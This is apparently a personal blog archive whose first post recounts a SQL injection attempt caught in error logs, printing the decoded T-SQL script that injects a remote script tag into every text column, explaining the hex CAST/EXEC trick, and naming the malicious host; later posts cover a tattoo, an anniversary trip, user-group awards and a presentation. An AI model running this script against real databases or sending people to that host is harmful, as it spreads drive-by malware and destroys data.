I use ELMAH to take care of un-handled exceptions on my web sites, including www.iedotnetug.org. It works well, and sends me an email when something goes wrong. I typically get 2-3 emails about the user group site a week, usually bots or spiders causing 404 errors. Today I woke up with two emails with the following errors:

System.FormatException: Input string was not in a correct format.

Ok, I see these all the time, almost deleted the message, but decided to scroll down just a bit more to the variables to see what spider triggered this. You won't believe what I saw.

Now a good friend of mine, and member of the user group - Matt Penner - is constantly generating errors on the user group site when trying to submit his Most Valuable Member points. I had just finished making a fix last night, and thought he'd get a kick out of seeing this. So I forward it on to Matt. His response was:

"Wow, can you say SQL Injection Attack?  Do you really look over all the error messages?  Do they come in your email?  That could be a lot to wade through.  How much do you get? You've probably already figured out their code but here's what they were trying to do:" 

He then goes on to show me the SQL which was in this HEX string. Pretty scary stuff.

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor
CURSOR FOR
select a.name,b.name
from sysobjects a,syscolumns b
where a.id=b.id
and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT
FROM Table_Cursor
INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec('
update ['+@T+']
set ['+@C+']=''"></title><script src="http://<effing domain removed to protect my readers>/csrss/w.js"></script><!--''+['+@C+']
where '+@C+' not like ''%"></title><script src="http://<effing domain removed to protect my readers>/csrss/w.js"></script><!--''')
FETCH NEXT
FROM Table_Cursor
INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Matt then goes on to say:

"This looks fairly nasty. He's really trying to replace any TITLE tag on your HTML pages. If your titles were dynamically generated from SQL (and that's a pretty big if) this would close the tag, insert a script the browser would run and then comment out the rest of the page. However, HTML is fairly forgiving so this script would probably run no matter what tag got hit.

But that's not the bad part. This script changes every single text column in every table in your database. Ugh! The sheer destruction of all your data would probably debilitate the site as a whole no matter what.

But you have to give him props. He does optimize the code for you. For instance, his script doesn't update fields that have already been hacked previously. So I guess he's kind enough not to waste processes on your SQL box. Maybe you should thank him."

Now Matt works at a school district and his network is secure. But because he's a geek like me, he decides to visit the domain. This is what he finds:

Matt tells me the code is in HEX and he had to use PSPad to decrypt it. He goes on to say:

"After IIS unencodes the query string this turns into:
SET @S = CAST(0xBlahBlahBlah AS CHAR(4000));
EXEC (@S);

It looks like SQL's CAST statement is smart enough to know that 0x is a hex string and automatically converts it to text for you.  This is much like a CAST(blah as datetime) is smart enough to convert dates from a variety of different formats.  Now it's in a plain text string which is dynamically executed by the EXEC statement."

We email about it a few more times, then consider the matter closed. All until I run across this blog entry from Steve Trefethen today. The same attack was tried on his blog, however he went further and downloaded the JavaScript. The JavaScript in turn will insert an <IFRAME> which will then load some pretty nasty ActiveX controls.

I have been meaning to do some major overhauling on the user group site, especially to get rid of the query string parameters. Fortunately for me, the query string parameter is encoded and then passed into a SqlDataSource Parameter. Whew! I guess I know what I'm going to be doing sooner, rather than later.

Oh, and if you want to bypass my protection for you and throw caution to the wind, replace "http://<effing domain removed to protect my readers>" with www0.douhunqn.cn. You have been warned.

Big props to Matt for helping me out.

James

By the way, as I was preparing this and pasting the various bits of code into Live Writer, the following NOD 32 anti virus window popped up:

Nasty, nasty stuff.

Wedding rings are worn on the left hand, as the veins in the arm go straight to the heart. During my time with Carmina, I've collected several trinkets which I wear on my left hand and wrist. Little tokens of her, which go straight to my heart. While planning our 3rd anniversary trip to Ensenada, I decided to surprise her with a picture of a Mayan calendar representing our wedding date - July 23, 2005. It took a while to figure it out until I found a few different web sites with glyphs and tutorials on how to translate dates. I brought the artwork and information home, showed Carmina and she was really tickled, but started wondering what it was all about.

I have two great friends @joshhighland and @gemery who have tattoos. Josh is almost totally covered with the most beautiful artwork I have seen. Geoff is a world traveler and gets a tattoo from every continent he has visited. Now I'm an older guy, who occasionally will put a hoop through the ancient hole in my earlobe, but with no body art to mention.

With the deep love of my wife (and of Mayan heritage), my two brothers as an inspiration and going a bit further, in my head and to myself, I decided I would get a tattoo while in Mexico. While driving I broke the news to Carmina. She got all excited and decided to join me on my search for a place to get it done.

Ensenada is the city of rip-offs, cheap transvestites and counterfeit Cuban cigars. Neither of us felt terribly comfortable in having me get inked in any of the places we saw. Somewhat disappointed, Carmina perked me up by mentioning Chris, the husband of one of her co-workers, Alma. Chris works for the city of Riverside and does tattoos on the side. Carmina hooks me up with Chris and we set up a date.

Today was the day. I didn't sleep at all the night before, I was excited. I had heard it would hurt, and seen pictures of right afterwards with the oozing, but I really wanted to do this. Chris is an awesome guy, un-assuming, friendly, joking, a liberal. His "shop" is decorated with slasher movie props, meat cleavers, meat hooks and antique car memorabilia. "Welcome to the Butcher Shop Tattoo Parlor" is painted on the floor.

So we get started. At first I had wanted it on the inside of my arm. Chris asks me if I'm sure, tells me it will really hurt in that spot and talks me into putting it directly on my bicep. I agree, so he traces the design, and works three times to get it just right on my arm. This isn't like getting the wrong shade of paint in the bathroom, once you start, there is no going back, and I appreciate him taking his time.

Time to start. Outline is first and I think, this isn't so bad. I start meditating on my third eye and breath deeply, getting into the experience. Things are going well, when all of a sudden...WTF!!! Ow!!! that hurts! He just started outlining into the inside of my arm, right on the edge where I wanted him to start. OMG this HURTS! I let it all wash over me, glad when he gets to the outside of my arm, squirming when he gets to the inside, breathing a sigh when he stops for more ink. He is careful and detailed and it takes an hour to do the outlining. We take a short break to stretch legs, drink some water, and pee. Then its time for the shading.

Chris says the shading will be easier, "it's more of a burn, than a tearing like the outline". Whew...ok, I can deal with this. WRONG! The outlining is done with a single needle. Shading is done with four to seven needles dragged across the skin. The soft part of my arm takes the brunt of the pain. After each pass, Chris wipes the skin, and I don't know what is worse, the needle or the wiping of punctured skin with a paper towel and green soap. He's using a lighter shade of black, but all I see is red, my blood under the skin. "Don't worry, he says, that will fade. This is looking awesome!" During the shading, I'm squirming big time. Chris teases me with "it's rough isn't it?" I respond with "F*** you"! We both laugh and get on with it.

Finally he's done with the shading but now wants to put some highlights with white. Nice, more poking, but I've gone this far, we're in 3 hours by now, so what the heck. Another 30 minutes and then he's ready to do the details. Huh!?!

Carmina's favorite color is purple. The top glyph means "Esposa". I had previously asked Chris about coloring, so when he was done with the detailing he get's ready to start with the purple highlights on the top glyph.

Four hours later and we're done. It's amazing how fast the pain fades and I look at myself in the mirror. The white highlights make it pop, the purple is cool, and it is "more better" than I had imagined.

Will I get another? Who knows. This one is significant and meaningful to me. Will getting another dilute this feeling?

Here are the pictures

Original graphic based on my research

My finished tattoo

The Mayan calendar is actually a number of days from creation, with the significant event the main glyph on the top. Each long oval represents "five" and each open circle represents "one", with the other glyphs representing the portion of time in the epoch. So, in this case the top glyph represents "the wife of", with the rest counting up the days from creation to when Carmina and I were married.

Carmina is already looking up glyphs for what she wants. Have I mentioned how much I love this woman?

James

Last Wednesday (7/23) was Carmina's and my third anniversary. Since our lives revolve around our families, with varying members coming and going, birthday and graduation parties, master degree studies, boyfriends spending weekends, user group meetings, running errands...you get the picture, Carmina and I *rarely* have time to spend alone together. So when we got married, we promised ourselves, that the first weekend after July 23 would be our own alone time. A time to go away to somewhere we've never been. A time to be alone. A time to get to know each other again. A time to give the love engine a few strokes and tend to the flames.

This year we decided our destination would be Ensenada, Baja California, Mexico. While we had said, a place neither of us had been, we decided my trip during the early 80's didn't count. Sort of like robbing a bank 30 years ago, is beyond the statute of limitations.

So onto the interwebs to find a place in Baja to go. Search, search, search.... Bingo! Hotel Coral in Ensenada. Book it, ask for the vacation time, start planing, start dreaming.

Saturday morning comes, and we decided the night before to leave no later than 7:30 am. Willie asks us if we're going to leave any "emergency money". I ask him "why?" "In case I want to go to the movies." Darn kids. The trip down is uneventful. We get to Tijuana to run a few errands and I get the normal text message from Sprint..."welcome to Mexico. Feel free to make as many calls as you want, just make sure to press 011 before to authorize us to take every cent you will ever earn." We continue on down to Ensenada, but this time Carmina wants to take the Toll Roads the entire trip, not the usual browsing along every nook and cranny of the "libre" highway. Listening to our iPod collection we're having a great time. Windows down, music blaring, cool breezes, interesting sites, a highway worker straddling the center divider painting, we get to Hotel Coral, just as "Hip City" from Down to the Bone starts playing.

This hotel is awesome, just effing awesome! It reminds us of a fancy hotel in the Orange County beach areas, complete with circular driveway, doormen, fancy tiled entrance way, courteous staff. Check in is fine, and the room is all the the web site claims it to be. Before we head up, we stop by the concierge desk to ask around about what to do. We had noticed a lot of people dressed nicely and realize a wedding is about to take place. As we walk up to the desk, the concierge stands with a box of something and corsages, starting to walk away. But he sees us, sets his stuff down and tends to us. It's not until way later we realize he was tending to the wedding party, but stopped to help us out. Nice.

After settling into the room, we decide to head out for our first adventure, La Bufadora. Ensenada is an inlet of the Pacific. La Bufadora is at the end of a peninsula on the other side of the bay. If we were birds, we could fly there in 10 minutes. Instead we need to drive. Oh well, we're here for the adventure, so off we go. Lots of farmland with the typical roadside stands offering elote, honey, uvas, tamales, carnitas, etc.

What a change. La Bufadora is now a big tourist trap. Lots of stands selling junk...fake silver jewlery, fake cuban cigars, switchblades stamped with "made in china"... sigh. Carmina and I make our way down to the site, and there are tons of people standing around watching, some hanging out under the "do not climb on the rocks sign"

We head back to the hotel, enjoying the countryside along the way. After a stop at the mega mercado for snacks and tequila, we get back to our room to relax, drink and celebrate our time together and our time alone.

Later that night, the room phone rings. The conversation goes like this:

Me (groggy) - "hello?"
Phone voice - "Good night, sir"
Me (confused) - "good night, thank you"
Phone voice - "Your pizza is here"

Wow what service in Ensenada. The call to wish you good night, and give you a pizza. All that was needed was to be tucked in. :)

Here's some pictures of the first day at La Bufadora.

The next day we decided to wander around and explore Ensenada

During our wanderings in Ensenada, we came across the city museum. After spending a bit of time looking around, we started chatting with the lady working the counter. Asking what else was there to do, she recommended Guadalupe, the Mexican Wine Country. "C'mon, I say to myself, Mexican Wine". Not that I'm a wine snob, for Pete's sake, it's Two Buck Chuck from Trader Joe's for me, but I wouldn't have put "wine country" and "Mexico" together. So, seeing as we love adventures in strange lands, we make plans to head out the next morning.

The drive is great, and soon we arrive at the entrance of Vina Ruta.

The air is clear and cool. The sky is a blue which makes your eyes hurt, and driving down the "Vina Ruta" we're amazed at the number of small vineyards and olive groves in the area. So totally amazing. Every 1/4 mile is a turn off to a small winery and we have a hard time deciding where to stop.

Apparently a hundred years ago a group of Russians settled in the valley. We stop at another museum across the street from a small cafe with wine tasting. Ok, here goes our first sip of Mexican wine. "umm, nah, I don't think so". It is way too sweet, thick, with a nasty, gnarly aftertaste. So, the wine sucks but the area is beautiful, peaceful and relaxing.

But, we're on an adventure and with all the other wineries and vineyards, there has to be something better. Driving and driving and driving we see a big white building up on a hill. As we get closer, a sign "Monte Xanic Vineyards" directs us off the road. This looks interesting and we drive through hundreds of acres of vines making our way to the big white building. We follow the signs pointing us to the wine tasting room and end up in the cask room (I guess that's what its called).

The fee for tasting their eight wines is eight dollars. I guess if you have to pay, then it must be good. Luis, behind the counter, starts us out with the whites. Actually they aren't too bad, and Carmina, not a wine drinker, likes them. As we move on to the reds, things start to get interesting. I don't know how to describe wine, nor do I know how to judge it, other than either "it's good", or "yuck". But with these reds, I have to add a new one. "GTFO! OMG! WOW!" These wines are smooth, with a buttery feel, a dry aftertaste, and absolutely the best Cabernet I have tasted. And not a bad price either, $13.00.

Talking with Luis he asks if we saw the picnic setup by the lake. Every Sunday, the chef from town comes to cook and server people. Since its been a long day, we head down to eat and see what is what.

This aren't street tacos. This is actual gourmet food. Sitting on a picnic table. By a lake with a cool breeze. With my beautiful wife.

What a way to celebrate three years with the love of my life.

• Point submission would expire 2 months after the activity date (I didn't want to have to keep track of something 11 months ago.)
• If points were submitted with 7 days of the meeting, they were doubled.
• If there were more than 20 attendees at the meeting, the points were doubled again (see where I'm going? let's get more people at the meetings).

The Inland Empire .NET User's Group held their first annual Most Valuable Member Awards. Members gain points by giving back to the community, with the top contributor being named Most Valuable Member. The recognition and prizes they receive are significant, and it wouldn't be possible without the help of the sponsors.

Here is what the MVM, Runner Up, and Second Runner Up receive

The Most Valuable Members for 2007/2008 are:

Most Valuable Member 2007/2008. 42 entries and total points of 19,400 - Volkan Uzun

Volkan has been coming to the meetings for several years, working in several levels of the group, most recently developing and teaching a 12 week Beginner's ASP.NET course affiliated with the IEDOTNET, writing several blog postings per month, and recently received two Microsoft Certifications. He must stay up nights, thinking of new ways to give back to the development community.

MVM Runner Up. 21 entries and total points of 17,840 - Michael Roth

Mike has a ton of great ideas, and will someday make his fortune on the interwebs. He is diligent about submitting his points early, and loves to donate a previously won raffle prize to someone else.

MVM Second Runner Up. 23 entries and total points of 16,110 - Paul Chu

Paul makes the trek from San Gabriel every meeting. He is always here early to help setup, stays late to help tear down, actively participates in discussions during the meetings, and offers to help where ever he can.

In addition, the follow members all participated:

• Mike Vincent from INETA will be presenting on Dynamic Languages (Python, Javascript, Ruby)
• Matt Penner (yeah, that Matt Penner) will be showing us how to set up source control with SVN
• Our local MVP, Al Pascual, from ESRI, will be showing off his open source project called GeoTwitter
• Janine Rood, InnerWorkings Director of Marketing will be showing us how to use the InnerWorkings Drills
• Efren Toscano from TechZulu will be on hand to video tape the whole event
• Various other special guests will be making appearances as well

Plus, if your name is on the upper left list of the UG website, you'll get a prize for participating. And if that's not enough, the sponsors have stepped forward for this event and are providing extra swag.

So what are you waiting for? It's time to show the rest of the .NET development world that the Inland Empire is force to be reckoned with! RSVP now to get in on all the fun, plus you'll get an extra raffle ticket.

Attendance fee for non-members is $5.00. Food (not pizza this time around), sodas and water will be on hand.

Thanks! See you next Tuesday. Have a happy, and safe 4th of July!

James

So, last week Willie and his homies performed at his school's talent show. Here's one of the better songs.... :)

and one that could use a bit more practice

But what can I say? My kid has heart!

James

When I presented at SQL 2008 Fire Starter last May, my good friend Geoff Emery interviewed me for TechZulu.

So, for your geeky, drawling enjoyment... I give you this....

As I mentioned in a previous post, I presented at the SQL 2008 Firestarter event. What I didn't mention was a story about a bit of metaphysics and a prime example of how the Universe looks out for those believers.

Working on Latina Business.NET with Carmina, I ran across, at one of our customers, a toy machine that sold little plastic "homies". I thought they were cool and one day went with a ton of quarters and bought as many as I could. They all sit on my monitors and inspire me when building a web site for one of our customers. These little plastic figures are great. With a lot of detail, and fantastic expressions on their faces, having them look down on me while I'm working, gives me the ideas to build a great bakery, jumper, party supply or mercado web site.

I was having problems getting my site together. Computer issues, bits changing, work things, you name it, I had to deal with it. But what got me through were my homies. They kept staring down at me, and settled me down. I got my stuff together and was ready for the next day.

I packed my stuff up the night before and was ready to roll early. As I was heading downstairs to leave, a voice in my head said "take us with you". Usually when I'm heading out, all I can think of, is traffic, being on time, whatever. But this time, I stopped, looked at my system and said to myself "OK". I scooped up the two homies that always seem to call to me; my first one, and old dude sitting in a chair, and a crazy looking one selling bags of oranges.

I got to the event site without a hitch and things went smoothly. As it turns out I was the scheduled to be the first presenter for the Developer's Track. Taking a few minutes to check out the meeting room and setup, I did so, and took out my Old Dude, and Orange Guy, putting them on the podium. Not blatantly so, but in a position for them to watch over me unobtrusively. I was just getting ready to start my presentation, when I was interrupted that I needed to move rooms. A bigger room. So many people wanted to see my presentation, the organizers actually moved me to a bigger room.

I packed up my stuff, put Old Dude and Orange Guy in my shirt pocket, and moved over to the big place. Nice. My presentation went great; no issues, the demo gods where nice to me, intelligent questions were asked, and I got not one, but two rounds of applause. All the time my homies were watching me.

I head back to the speakers room to see what is going on. My two friends Geoff Emery and Matt Penner are having major problems with their demo, and their machine. No Internet connection, SQL Server is giving them fits, PowerPoint slides are jacked up. The demo gods are not happy. As I set my bag down and get behind my buddies, I fold my arms (what I usually do when concentrating) and I feel two little objects in my shirt pocket. My homies!

I put Old Dude and Orange Guy on their laptop, mostly just for grins, but then something amazing starts to happen. Things start coming together, Geoff decides to use his cell phone for connectivity, the machine decides to behave, both Geoff and Matt calm down. Their presentation is right after lunch. And they just rock. No more problems, no more issues.

In thinking about this I'm looking at my homies and see "HOMIESHOP" on the back. Doing a quick search I find www.homiesworld.com, with complete listings and descriptions of all the homies figures made so far.

Actually Orange Guy is named Orange Vato and Old Dude is Wizard. Read their descriptions, especially Wizard's and see if they make sense to you after this story.

Browsing around the Homies site, I really started liking it. They have created all these great characters, embracing their differences, while ending each description on a positive note.

You just gotta love your homies.

Yesterday I gave my presentation on ADO.NET Data Services at the Firestarter SQL 2008 event at the Microsoft Training Center in Irvine. I had a great time presenting, they even had to move my group to a bigger room, and it more than made up for the stress of trying to prepare a presentation with fluidly changing bits.

For your pre-beta, pre-CTP enjoyment I give you my slides and code firestarter-adodataservices.zip (588.30 kb)

If you have questions, drop me a line,

James